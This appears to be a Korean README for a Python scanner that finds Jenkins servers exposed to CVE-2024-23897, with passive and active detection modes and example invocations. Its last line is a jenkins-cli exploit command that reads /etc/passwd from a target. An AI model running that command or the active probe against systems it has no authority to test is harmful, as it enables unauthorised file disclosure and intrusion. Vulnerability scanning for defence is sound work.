
Jenkins 환경을 탐지하고 CVE-2024-23897 취약점을 확인합니다.
Jenkins 환경을 감지하고 CVE-2024-23897을 확인합니다.
다음 경로를 테스트합니다: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json
다음을 통해 식별합니다:
수동(기본값): 감지된 버전을 임계값과 비교합니다:
활성(--active): Jenkins CLI 바이너리 프로토콜 핸드셰이크를 HTTP로 전송합니다. 서버가 200 + Content-Type: application/octet-stream으로 응답하면, CLI 채널이 열려 있고 익스플로잇이 적용 가능함을 확인합니다.
python jenkins_scan.py -f urls.txt
python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt
python jenkins_scan.py -f urls.txt -t 20 -v --no-color
java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"